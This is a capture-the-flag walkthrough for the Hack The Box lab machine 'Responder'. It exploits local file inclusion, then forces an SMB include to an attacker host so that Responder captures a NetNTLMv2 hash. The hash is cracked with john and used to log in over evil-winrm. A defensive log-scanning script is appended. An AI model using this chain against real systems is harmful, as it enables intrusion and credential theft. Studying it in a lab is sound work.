
Responder

nmap -sV -p- --min-rate 5000 <ip_target>
curl <ip_target>

Name-Based Virtual Hosting

Name-Based Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server. This allows one server to share its resources, such as memory and processor cycles, without requiring all the services to be used by the same hostname.

echo "<ip_target>   unika.htb" | sudo tee -a /etc/hosts
# if that gives an error, use a tab between the address and the hostname (-e makes echo interpret \t)
echo -e "<ip_target>\tunika.htb" | sudo tee -a /etc/hosts

Open the website unika.htb in your browser.

The website is vulnerable to LFI (local file inclusion) through the page parameter:

http://unika.htb/index.php?page=/../../../../../../../../windows/system32/drivers/etc/hosts

NTLM

NTLM is a collection of authentication protocols created by Microsoft. It is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain.

Detail NTLM

Responder

In the PHP configuration file php.ini, allow_url_include is set to Off by default, meaning PHP does not load remote HTTP or FTP URLs, which prevents remote file inclusion attacks. However, even when allow_url_include and allow_url_fopen are both set to Off, PHP does not prevent the loading of SMB URLs. In our case, we can misuse this behaviour to capture the NTLM hash.

hacktricks

Responder

Start

git clone https://github.com/lgandx/Responder
cd Responder
cat Responder.conf
sudo python3 Responder.py -I tun0
http://unika.htb/index.php?page=//<your_ip>/tes
echo "Administrator::RESPONDER:3f5e727d7ed35f9c…" > hash.txt   # paste the full NetNTLMv2 line Responder printed; it is truncated here
$ john -w=/path/to/rockyou.txt hash.txt
badminton        (Administrator)
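As an added example that is not part of the original writeup, a small Python scanner a defender could run over web server access logs to flag the two request shapes used above (directory traversal into windows/system32 and an SMB UNC path in the page parameter). The log lines are constructed; the function names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache access-log lines (not from the original page).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=french.html HTTP/1.1" 200 512
10.10.14.5 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?page=/../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 824
10.10.14.5 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?page=//10.10.14.5/tes HTTP/1.1" 200 0
10.10.14.5 - - [01/Jan/2024:10:00:20 +0000] "GET /index.php?page=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 300
"""

# Pulls the request target out of the quoted "METHOD target HTTP/x.y" field.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_page_param(value):
    """Return the reasons a page= value looks like LFI / UNC abuse (empty if benign).

    parse_qs has already URL-decoded the value, so encoded traversal is caught too.
    """
    reasons = []
    if '../' in value or '..\\' in value:
        reasons.append('path traversal')
    # //host/share or \\host\share: PHP include() of a UNC path triggers an
    # outbound SMB connection and an NTLM authentication to that host.
    if re.match(r'^(//|\\\\)[^/\\]+[/\\]', value) or value.lower().startswith('smb://'):
        reasons.append('UNC/SMB path (NTLM leak via include)')
    if re.match(r'^[A-Za-z]:[/\\]', value) or value.lower().startswith('/windows/'):
        reasons.append('absolute OS path')
    return reasons


def scan_log(text):
    """Return (line_no, page_value, reasons) for every suspicious request in the log."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group('target')).query)
        for page in query.get('page', []):
            reasons = classify_page_param(page)
            if reasons:
                hits.append((no, page, reasons))
    return hits


if __name__ == '__main__':
    for no, page, reasons in scan_log(SAMPLE_LOG):
        print(f'line {no}: page={page!r} -> {", ".join(reasons)}')
```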

WinRM

We'll connect to the WinRM service on the target and try to get a session. Because PowerShell isn't installed on Linux by default, we'll use a tool called Evil-WinRM which is made for this kind of scenario.

sudo apt install evil-winrm
evil-winrm -i <ip_target> -u administrator -p badminton

flag is in C:\Users\mike\Desktop